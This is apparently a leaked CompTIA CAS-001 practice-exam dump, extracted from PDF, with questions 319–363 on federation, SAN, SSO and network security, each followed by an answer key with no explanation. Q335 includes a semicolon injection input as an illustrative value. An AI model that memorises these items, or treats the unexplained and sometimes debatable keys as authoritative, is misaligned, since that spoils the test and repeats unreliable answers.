B. The Provisioning Service Provider (PSP) entity makes the provisioning request, the Provisioning Service Target (PST) responds to the PSP requests, and theProvisioning Service Provider (PSP) performs the provisioning.

C. The Request Authority (RA) entity makes the provisioning request, the Provisioning Service Target (PST) responds to the RA requests, and the ProvisioningService Provider (PSP) performs the provisioning.

D. The Request Authority (RA) entity makes the provisioning request, the Provisioning Service Provider (PSP) responds to the RA requests, and the ProvisioningService Target (PST) performs the provisioning.

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

Real 167CompTIA CAS-001 Exam

QUESTION 320A trust relationship has been established between two organizations with web based services. One organization is acting as the Requesting Authority (RA) and theother acts as the Provisioning Service Provider (PSP). Which of the following is correct about the trust relationship?

A. The trust relationship uses SAML in the SOAP header. The SOAP body transports the SPML requests / responses.B. The trust relationship uses XACML in the SAML header. The SAML body transports the SOAP requests / responses.C. The trust relationship uses SPML in the SOAP header. The SOAP body transports the SAML requests / responses.D. The trust relationship uses SPML in the SAML header. The SAML body transports the SPML requests / responses.

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 321A Security Administrator has some concerns about the confidentiality of data when using SOAP. Which of the following BEST describes the Security Administrator'sconcerns?

Page 169: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

A. The SOAP header is not encrypted and allows intermediaries to view the header data. The body can be partially or completely encrypted.B. The SOAP protocol supports weak hashing of header information. As a result the header and body can easily be deciphered by brute force tools.C. The SOAP protocol can be easily tampered with, even though the header is encrypted.D. The SOAP protocol does not support body or header encryption which allows assertions to be viewed in clear text by intermediaries.

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 322Which of the following protocols only facilitates access control?

A. XACMLB. KerberosC. SPML

Real 168CompTIA CAS-001 Exam

D. SAML

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 323Company ABC will test connecting networks with Company XYZ as part of their upcoming merger and are both concerned with minimizing security exposures toeach others network throughout the test. Which of the following is the FIRST thing both sides should do prior to connecting the networks?

A. Create a DMZ to isolate the two companies and provide a security inspection point for all inter- company network traffic.B. Determine the necessary data flows between the two companies.C. Implement a firewall that restricts everything except the IPSec VPN traffic connecting the two companies.D. Implement inline NIPS on the connection points between the two companies.

Correct Answer: B

Page 170: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Section: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 324-- Exhibit

-- Exhibit --

Company management has indicated that instant messengers (IM) add to employee productivity. Management would like to implement an IM solution, but does nothave a budget for the project. The security engineer creates a feature matrix to help decide the most secure product. Click on the Exhibit button.

Real 169CompTIA CAS-001 ExamWhich of the following would the security engineer MOST likely recommend based on the table?

A. Product AB. Product BC. Product CD. Product D

Correct Answer: CSection: (none)Explanation

Page 171: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Explanation/Reference:Explanation:

QUESTION 325An administrator attempts to install the package "named.9.3.6-12-x86_64.rpm" on a server. Even though the package was downloaded from the official repository,the server states the package cannot be installed because no GPG key is found. Which of the following should the administrator perform to allow the program to beinstalled?

A. Download the file from the program publisher's website.B. Generate RSA and DSA keys using GPG.C. Import the repository's public key.D. Run sha1sum and verify the hash.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 326Two storage administrators are discussing which SAN configurations will offer the MOST confidentiality. Which of the following configurations would theadministrators use? (Select TWO).

A. DeduplicationB. ZoningC. SnapshotsD. MultipathingE. LUN masking

Correct Answer: BESection: (none)Explanation

Explanation/Reference:Explanation:

Real 170

Page 172: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

CompTIA CAS-001 Exam

QUESTION 327When generating a new key pair, a security application asks the user to move the mouse and type random characters on the keyboard. Which of the followingBEST describes why this is necessary?

A. The user needs a non-repudiation data source in order for the application to generate the key pair.B. The user is providing entropy so the application can use random data to create the key pair.C. The user is providing a diffusion point to the application to aid in creating the key pair.D. The application is requesting perfect forward secrecy from the user in order to create the key pair.

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 328Company XYZ has experienced a breach and has requested an internal investigation be conducted by the IT Department. Which of the following represents thecorrect order of the investigation process?

A. Collection, Identification, Preservation, Examination, Analysis, Presentation.B. Identification, Preservation, Collection, Examination, Analysis, Presentation.C. Collection, Preservation, Examination, Identification, Analysis, Presentation.D. Identification, Examination, Preservation, Collection, Analysis, Presentation.

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 329A medium-sized company has recently launched an online product catalog. It has decided to keep the credit card purchasing in-house as a secondary potentialincome stream has been identified in relation to sales leads. The company has decided to undertake a PCI assessment in order to determine the amount of effortrequired to meet the business objectives. Which compliance category would this task be part of?

Real 171

Page 173: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

CompTIA CAS-001 Exam

A. Government regulationB. Industry standardC. Company guidelineD. Company policy

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 330Company XYZ recently acquired a manufacturing plant from Company ABC which uses a different manufacturing ICS platform. Company XYZ has strict ICSsecurity regulations while Company ABC does not. Which of the following approaches would the network security administrator for Company XYZ MOST likelyproceed with to integrate the new manufacturing plant?

A. Conduct a network vulnerability assessment of acquired plant ICS platform and correct all identified flaws during integration.B. Convert the acquired plant ICS platform to the Company XYZ standard ICS platform solely to eliminate potential regulatory conflicts.C. Conduct a risk assessment of the acquired plant ICS platform and implement any necessary or required controls during integration.D. Require Company ABC to bring their ICS platform into regulatory compliance prior to integrating the new plant into Company XYZ's network.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 331An Association is preparing to upgrade their firewalls at five locations around the United States. Each of the three vendor's RFP responses is in-line with the securityand other requirements. Which of the following should the security administrator do to ensure the firewall platform is appropriate for the Association?

A. Correlate current industry research with the RFP responses to ensure validity.B. Create a lab environment to evaluate each of the three firewall platforms.C. Benchmark each firewall platform's capabilities and experiences with similar sized companies.D. Develop criteria and rate each firewall platform based on information in the RFP responses.

Page 174: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

Real 172CompTIA CAS-001 Exam

QUESTION 332A UNIX administrator notifies the storage administrator that extra LUNs can be seen on a UNIX server. The LUNs appear to be NTFS file systems. Which of thefollowing MOST likely happened?

A. The iSCSI initiator was not restarted.B. The NTFS LUNs are snapshots.C. The HBA allocation is wrong.D. The UNIX server is multipathed.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Real 183CompTIA CAS-001 Exam

Explanation:

QUESTION 333Company ABC's SAN is nearing capacity, and will cause costly downtimes if servers run out disk space. Which of the following is a more cost effective alternative tobuying a new SAN?

A. Enable multipath to increase availabilityB. Enable deduplication on the storage poolsC. Implement snapshots to reduce virtual disk sizeD. Implement replication to offsite datacenter

Correct Answer: B

Page 175: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Section: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 334A new internal network segmentation solution will be implemented into the enterprise that consists of 200 internal firewalls. As part of running a pilot exercise, it wasdetermined that it takes three changes to deploy a new application onto the network before it is operational. Security now has a significant affect on overallavailability. Which of the following would be the FIRST process to perform as a result of these findings?

A. Lower the SLA to a more tolerable level and perform a risk assessment to see if the solution could be met by another solution. Reuse the firewall infrastructureon other projects.

B. Perform a cost benefit analysis and implement the solution as it stands as long as the risks are understood by the business owners around the availabilityissues. Decrease the current SLA expectations to match the new solution.

C. Engage internal auditors to perform a review of the project to determine why and how the project did not meet the security requirements. As part of the reviewask them to review the control effectiveness.

D. Review to determine if control effectiveness is in line with the complexity of the solution.Determine if the requirements can be met with a simpler solution.

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 335Real 184CompTIA CAS-001 Examselect id, firstname, lastname from authors

User input= firstname= Hack;man

lastname=Johnson

Which of the following types of attacks is the user attempting?

A. XML injectionB. Command injection

Page 176: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

C. Cross-site scriptingD. SQL injection

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 336Three companies want to allow their employees to seamlessly connect to each other's wireless corporate networks while keeping one consistent wireless clientconfiguration. Each company wants to maintain its own authentication infrastructure and wants to ensure that an employee who is visiting the other two companiesis authenticated by the home office when connecting to the other companies' wireless network. All three companies have agreed to standardize on 802.1x EAP-PEAP-MSCHAPv2 for client configuration. Which of the following should the three companies implement?

A. The three companies should agree on a single SSID and configure a hierarchical RADIUS system which implements trust delegation.B. The three companies should implement federated authentication through Shibboleth connected to an LDAP backend and agree on a single SSID.C. The three companies should implement a central portal-based single sign-on and agree to use the same CA when issuing client certificates.D. All three companies should use the same wireless vendor to facilitate the use of a shared cloud based wireless controller.

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 337A government agency considers confidentiality to be of utmost importance and availability issues to be of least importance. Knowing this, which of the followingcorrectly orders various

Real 185CompTIA CAS-001 Examvulnerabilities in the order of MOST important to LEAST important?

A. Insecure direct object references, CSRF, SmurfB. Privilege escalation, Application DoS, Buffer overflowC. SQL injection, Resource exhaustion, Privilege escalation

Page 177: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

D. CSRF, Fault injection, Memory leaks

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 338The Chief Executive Officer (CEO) of a large prestigious enterprise has decided to reduce business costs by outsourcing to a third party company in anothercountry. Functions to be outsourced include: business analysts, testing, software development and back office functions that deal with the processing of customerdata. The Chief Risk Officer (CRO) is concerned about the outsourcing plans. Which of the following risks are MOST likely to occur if adequate controls are notimplemented?

A. Geographical regulation issues, loss of intellectual property and interoperability agreement issuesB. Improper handling of client data, interoperability agreement issues and regulatory issuesC. Cultural differences, increased cost of doing business and divestiture issuesD. Improper handling of customer data, loss of intellectual property and reputation damage

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 339An organization has just released a new mobile application for its customers. The application has an inbuilt browser and native application to render content fromexisting websites and the organization's new web services gateway. All rendering of the content is performed on the mobile application.

The application requires SSO between the application, the web services gateway and legacy UI. Which of the following controls MUST be implemented to securelyenable SSO?

A. A registration process is implemented to have a random number stored on the client.B. The identity is passed between the applications as a HTTP header over REST.C. Local storage of the authenticated token on the mobile application is secured.

Real 186CompTIA CAS-001 Exam

Page 178: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

D. Attestation of the XACML payload to ensure that the client is authorized.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 340A bank provides single sign on services between its internally hosted applications and externally hosted CRM. The following sequence of events occurs:

1. The banker accesses the CRM system, a redirect is performed back to the organization's internal systems.

2. A lookup is performed of the identity and a token is generated, signed and encrypted.

3. A redirect is performed back to the CRM system with the token.

4. The CRM system validates the integrity of the payload, extracts the identity and performs a lookup.

5. If the banker is not in the system and automated provisioning request occurs.

6. The banker is authenticated and authorized and can access the system.

This is an example of which of the following?

A. Service provider initiated SAML 2.0B. Identity provider initiated SAML 1.0C. OpenID federated single sign onD. Service provider initiated SAML 1.1

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 341A corporation implements a mobile device policy on smartphones that utilizes a white list for allowed applications. Recently, the security administrator notices that aconsumer cloud based storage application has been added to the mobile device white list. Which of the following security implications should the security

Page 179: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

administrator cite when recommending the application's removal from the white list?

A. Consumer cloud storage systems retain local copies of each file on the smartphone, as well as Real 187CompTIA CAS-001 Examin the cloud, causing a potential data breach if the phone is lost or stolen.

B. Smartphones can export sensitive data or import harmful data with this application causing the potential for DLP or malware issues.C. Consumer cloud storage systems could allow users to download applications to the smartphone. Installing applications this way would circumvent the

application white list.D. Smartphones using consumer cloud storage are more likely to have sensitive data remnants on them when they are repurposed.

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 342A security policy states that all applications on the network must have a password length of eight characters. There are three legacy applications on the network thatcannot meet this policy. One system will be upgraded in six months, and two are not expected to be upgraded or removed from the network. Which of the followingprocesses should be followed?

A. Establish a risk matrixB. Inherit the risk for six monthsC. Provide a business justification to avoid the riskD. Provide a business justification for a risk exception

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 343A systems administrator establishes a CIFS share on a Unix device to share data to windows systems. The security authentication on the windows domain is set tothe highest level. Windows users are stating that they cannot authenticate to the Unix share. Which of the following settings on the Unix server is the cause of thisproblem?

Page 180: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

A. Refuse LM and only accept NTLMv2B. Accept only LMC. Refuse NTLMv2 and accept LMD. Accept only NTLM

Correct Answer: ASection: (none)Explanation

Explanation/Reference:answer is verified.

QUESTION 344Company XYZ provides hosting services for hundreds of companies across multiple industries including healthcare, education, and manufacturing. The securityarchitect for company XYZ is reviewing a vendor proposal to reduce company XYZ's hardware costs by combining multiple physical hosts through the use ofvirtualization technologies. The security architect notes concerns about data separation, confidentiality, regulatory requirements concerning PII, and administrativecomplexity on the proposal. Which of the following BEST describes the core concerns of the security architect?

A. Most of company XYZ's customers are willing to accept the risks of unauthorized disclosure and access to information by outside users.B. The availability requirements in SLAs with each hosted customer would have to be re-written to account for the transfer of virtual machines between physical

platforms for regular maintenance.C. Company XYZ could be liable for disclosure of sensitive data from one hosted customer when accessed by a malicious user who has gained access to the

virtual machine of another hosted customer.D. Not all of company XYZ's customers require the same level of security and the administrative complexity of maintaining multiple security postures on a single

hypervisor negates hardware cost savings.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 345A security architect is designing a new infrastructure using both type 1 and type 2 virtual machines. In addition to the normal complement of security controls (e.g.antivirus, host hardening, HIPS/NIDS) the security architect needs to implement a mechanism to securely store cryptographic keys used to sign code and codemodules on the VMs. Which of the following will meet this goal without requiring any hardware pass-through implementations?

A. vTPM

Page 181: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

B. HSMC. TPMD. INE

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

Real 189CompTIA CAS-001 Exam

QUESTION 346A Linux security administrator is attempting to resolve performance issues with new software installed on several baselined user systems. After investigating, thesecurity administrator determines that the software is not initializing or executing correctly. For security reasons, the company has implemented trusted operatingsystems with the goal of preventing unauthorized changes to the configuration baseline. The MOST likely cause of this problem is that SE Linux is set to:

A. Enforcing mode with an incorrectly configured policy.B. Enforcing mode with no policy configured.C. Disabled with a correctly configured policy.D. Permissive mode with an incorrectly configured policy.

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 347A security auditor is conducting an audit of a corporation where 95% of the users travel or work from non-corporate locations a majority of the time. While theemployees are away from the corporate offices, they retain full access to the corporate network and use of corporate laptops. The auditor knows that thecorporation processes PII and other sensitive data with applications requiring local caches of any data being manipulated. Which of the following security controlsshould the auditor check for and recommend to be implemented if missing from the laptops?

A. Trusted operating systemsB. Full disk encryption

Page 182: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

C. Host-based firewallsD. Command shell restrictions

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 348Part of the procedure for decommissioning a database server is to wipe all local disks, as well as SAN LUNs allocated to the server, even though the SAN itself isnot being decommissioned. Which of the following is the reason for wiping the SAN LUNs?

http://www.gratisexam.com/

A. LUN masking will prevent the next server from accessing the LUNs.Real 190CompTIA CAS-001 Exam

B. The data may be replicated to other sites that are not as secure.C. Data remnants remain on the LUN that could be read by other servers.D. The data is not encrypted during transport.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 349Which of the following BEST describes the implications of placing an IDS device inside or outside of the corporate firewall?

Page 183: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

A. Placing the IDS device inside the firewall will allow it to monitor potential internal attacks but may increase the load on the system.B. Placing the IDS device outside the firewall will allow it to monitor potential remote attacks while still allowing the firewall to block the attack.C. Placing the IDS device inside the firewall will allow it to monitor potential remote attacks but may increase the load on the system.D. Placing the IDS device outside the firewall will allow it to monitor potential remote attacks but the firewall will not be able to block the attacks.

Correct Answer: BSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 350At 9:00 am each morning, all of the virtual desktops in a VDI implementation become extremely slow and/or unresponsive. The outage lasts for around 10 minutes,after which everything runs properly again. The administrator has traced the problem to a lab of thin clients that are all booted at 9:00 am each morning. Which ofthe following is the MOST likely cause of the problem and the BEST solution? (Select TWO).

A. Add guests with more memory to increase capacity of the infrastructure.B. A backup is running on the thin clients at 9am every morning.C. Install more memory in the thin clients to handle the increased load while booting.D. Booting all the lab desktops at the same time is creating excessive I/O.E. Install 10-Gb uplinks between the hosts and the lab to increase network capacity.F. Install faster SSD drives in the storage system used in the infrastructure.G. The lab desktops are saturating the network while booting.H. The lab desktops are using more memory than is available to the host systems.

Real 191CompTIA CAS-001 Exam

Correct Answer: DFSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 351A security administrator is shown the following log excerpt from a Unix system:

2013 Oct 10 07:14:57 web14 sshd[1632]: Failed password for root from 198.51.100.23 port 37914 ssh2

Page 184: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

2013 Oct 10 07:14:57 web14 sshd[1635]: Failed password for root from 198.51.100.23 port 37915 ssh2

2013 Oct 10 07:14:58 web14 sshd[1638]: Failed password for root from 198.51.100.23 port 37916 ssh2

2013 Oct 10 07:15:59 web14 sshd[1640]: Failed password for root from 198.51.100.23 port 37918 ssh2

2013 Oct 10 07:16:00 web14 sshd[1641]: Failed password for root from 198.51.100.23 port 37920 ssh2

2013 Oct 10 07:16:00 web14 sshd[1642]: Successful login for root from 198.51.100.23 port 37924 ssh2

Which of the following is the MOST likely explanation of what is occurring and the BEST immediate response? (Select TWO).

A. An authorized administrator has logged into the root account remotely.B. The administrator should disable remote root logins.C. Isolate the system immediately and begin forensic analysis on the host.D. A remote attacker has compromised the root account using a buffer overflow in sshd.E. A remote attacker has guessed the root password using a dictionary attack.F. Use iptables to immediately DROP connections from the IP 198.51.100.23.G. A remote attacker has compromised the private key of the root account.H. Change the root password immediately to a password not found in a dictionary.

Correct Answer: CESection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 352The security administrator is reviewing the business continuity plan which consists of virtual

Real 192CompTIA CAS-001 Examinfrastructures at corporate headquarters and at the backup site. The administrator is concerned that the VLAN used to perform live migrations of virtual machinesto the backup site is across the network provider's MPLS network. This is a concern due to which of the following?

A. The hypervisor virtual switches only support Q-in-Q VLANS, not MPLS. This may cause live migrations to the backup site to fail.B. VLANs are not compatible with MPLS, which may cause intermittent failures while performing live migrations virtual machines during a disaster.

Page 185: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

C. Passwords are stored unencrypted in memory, which are then transported across the MPLS network.D. Transport encryption is being used during the live migration of virtual machines which will impact the performance of the MPLS network.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 353A large bank deployed a DLP solution to detect and block customer and credit card data from leaving the organization via email. A disgruntled employee was able tosuccessfully exfiltrate data through the corporate email gateway by embedding a word processing document containing sensitive data as an object in a CAD file.Which of the following BEST explains why it was not detected and blocked by the DLP solution? (Select TWO).

A. The product does not understand how to decode embedded objects.B. The embedding of objects in other documents enables document encryption by default.C. The process of embedding an object obfuscates the data.D. The mail client used to send the email is not compatible with the DLP product.E. The DLP product cannot scan multiple email attachments at the same time.

Correct Answer: ACSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 354Due to a new regulatory requirement, ABC Company must now encrypt all WAN transmissions. When speaking with the network administrator, the securityadministrator learns that the existing routers have the minimum processing power to do the required level of encryption. Which of the following solutions minimizesthe performance impact on the router?

Real 193CompTIA CAS-001 Exam

A. Deploy inline network encryption devicesB. Install an SSL acceleration applianceC. Require all core business applications to use encryption

Page 186: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

D. Add an encryption module to the router and configure IPSec

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 355A business owner has raised concerns with the Chief Information Security Officer (CISO) because money has been spent on IT security infrastructure, butcorporate assets are still found to be vulnerable. The business recently implemented a patch management product and SOE hardening initiative. A third partyauditor reported findings against the business because some systems were missing patches. Which of the following statements BEST describes this situation?

A. The business owner is at fault because they are responsible for patching the systems and have already been given patch management and SOE hardeningproducts.

B. The audit findings are invalid because remedial steps have already been applied to patch servers and the remediation takes time to complete.C. The CISO has not selected the correct controls and the audit findings should be assigned to them instead of the business owner.D. Security controls are generally never 100% effective and gaps should be explained to stakeholders and managed accordingly.

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 356Company XYZ has purchased and is now deploying a new HTML5 application. The company wants to hire a penetration tester to evaluate the security of the clientand server components of the proprietary web application before launch. Which of the following is the penetration tester MOST likely to use while performing blackbox testing of the security of the company's purchased application? (Select TWO).

A. Code reviewB. SandboxC. Local proxyD. FuzzerE. Web vulnerability scanner

Real 194CompTIA CAS-001 Exam

Page 187: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Correct Answer: CDSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 357A company has been purchased by another agency and the new security architect has identified new security goals for the organization. The current location hasvideo surveillance throughout the building and entryways. The following requirements must be met:

1. Ability to log entry of all employees in and out of specific areas

2. Access control into and out of all sensitive areas

3. Two-factor authentication

Which of the following would MOST likely be implemented to meet the above requirements and provide a secure solution? (Select TWO).

A. Proximity readersB. Visitor logsC. Biometric readersD. Motion detection sensorsE. Mantrap

Correct Answer: ACSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 358During a new desktop refresh, all hosts are hardened at the OS level before deployment to comply with policy. Six months later, the company is audited forcompliance to regulations. The audit discovers that 40% of the desktops do not meet requirements. Which of the following is the cause of the noncompliance?

A. The devices are being modified and settings are being overridden in production.B. The patch management system is causing the devices to be noncompliant after issuing the latest patches.C. The desktop applications were configured with the default username and password.

Page 188: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

D. 40% of the devices have been compromised.

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

Real 195CompTIA CAS-001 Exam

QUESTION 359Which of the following does SAML uses to prevent government auditors or law enforcement from identifying specific entities as having already connected to aservice provider through an SSO operation?

A. Transient identifiersB. Directory servicesC. Restful interfacesD. Security bindings

Correct Answer: ASection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 360In order to reduce costs and improve employee satisfaction, a large corporation is creating a BYOD policy. It will allow access to email and remote connections tothe corporate enterprise from personal devices; provided they are on an approved device list. Which of the following security measures would be MOST effective insecuring the enterprise under the new policy? (Select TWO).

A. Provide free email software for personal devices.B. Encrypt data in transit for remote access.C. Require smart card authentication for all devicesD. Implement NAC to limit insecure devices access.E. Enable time of day restrictions for personal devices.

Page 189: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Correct Answer: BDSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 361Company XYZ provides cable television service to several regional areas. They are currently installing fiber-to-the-home in many areas with hopes of also providingtelephone and Internet services. The telephone and Internet services portions of the company will each be separate subsidiaries of the parent company. The boardof directors wishes to keep the subsidiaries separate from the parent company. However all three companies must share customer data for

Real 196CompTIA CAS-001 Examthe purposes of accounting, billing, and customer authentication. The solution must use open standards, and be simple and seamless for customers, while onlysharing minimal data between the companies. Which of the following solutions is BEST suited for this scenario?

A. The companies should federate, with the parent becoming the SP, and the subsidiaries becoming an IdP.B. The companies should federate, with the parent becoming the IdP, and the subsidiaries becoming an SSP.C. The companies should federate, with the parent becoming the IdP, and the subsidiaries becoming an SP.D. The companies should federate, with the parent becoming the ASP, and the subsidiaries becoming an IdP.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

QUESTION 362Warehouse users are reporting performance issues at the end of each month when trying to access cloud applications to complete their end of the month financialreports. They have no problem accessing those applications at the beginning of the month.

Network information:

DMZ network 192.168.5.0/24

VPN network 192.168.1.0/24

Datacenter 192.168.2.0/24

Page 190: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

User network - 192.168.3.0/24

HR network 192.168.4.0/24

Warehouse network 192.168.6.0/24

Finance network 192.168.7.0/24

Traffic shaper configuration:

VLAN Bandwidth limit (Mbps)

VPN50

User175

Real 197CompTIA CAS-001 ExamHR220

Finance230

Warehouse75

Guest50

External firewall allows all networks to access the Internet.

Internal Firewall Rules:

ActionSourceDestination

Permit192.168.1.0/24192.168.2.0/24

Permit192.168.1.0/24192.168.3.0/24

Permit192.168.1.0/24192.168.5.0/24

Permit192.168.2.0/24192.168.1.0/24

Permit192.168.3.0/24192.168.1.0/24

Page 191: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

Permit192.168.5.0/24192.168.1.0/24

Permit192.168.4.0/24192.168.7.0/24

Permit192.168.7.0/24192.168.4.0/24

Permit192.168.7.0/24any

Deny192.168.4.0/24any

Deny192.168.1.0/24192.168.4.0/24

Denyanyany

Which of the following restrictions is the MOST likely cause?

A. Bandwidth limit on the traffic shaper for the finance departmentB. Proxy server preventing the warehouse from accessing cloud applicationsC. Deny statements in the firewall for the warehouse networkD. Bandwidth limit on the traffic shaper for the warehouse department

Correct Answer: DSection: (none)Explanation

Explanation/Reference:Explanation:

Real 198CompTIA CAS-001 Exam

QUESTION 363A university Chief Information Security Officer is analyzing various solutions for a new project involving the upgrade of the network infrastructure within the campus.The campus has several dorms (two-four person rooms) and administrative buildings. The network is currently setup to provide only two network ports in each dormroom and ten network ports per classroom. Only administrative buildings provide 2.4 GHz wireless coverage.

The following three goals must be met after the new implementation:

1. Provide all users (including students in their dorms) connections to the Internet.

2. Provide IT department with the ability to make changes to the network environment to improve performance.

Page 192: CompTIA.Actualtests.CAS-001.v2015-03-30.by.Hiroshi · 2015. 3. 30. · CompTIA CAS-001 Exam A company currently does not use any type of authentication or authorization service for

http://www.gratisexam.com/

3. Provide high speed connections wherever possible all throughout campus including sporting event areas.

Which of the following risk responses would MOST likely be used to reduce the risk of network outages and financial expenditures while still meeting each of thegoals stated above?

A. Avoid any risk of network outages by providing additional wired connections to each user and increasing the number of data ports throughout the campus.B. Transfer the risk of network outages by hiring a third party to survey, implement and manage a 5.0 GHz wireless network.C. Accept the risk of possible network outages and implement a WLAN solution to provide complete 5.0 GHz coverage in each building that can be managed

centrally on campus.D. Mitigate the risk of network outages by implementing SOHO WiFi coverage throughout the dorms and upgrading only the administrative buildings to 5.0 GHz

coverage using a one for one AP replacement.

Correct Answer: CSection: (none)Explanation

Explanation/Reference:Explanation:

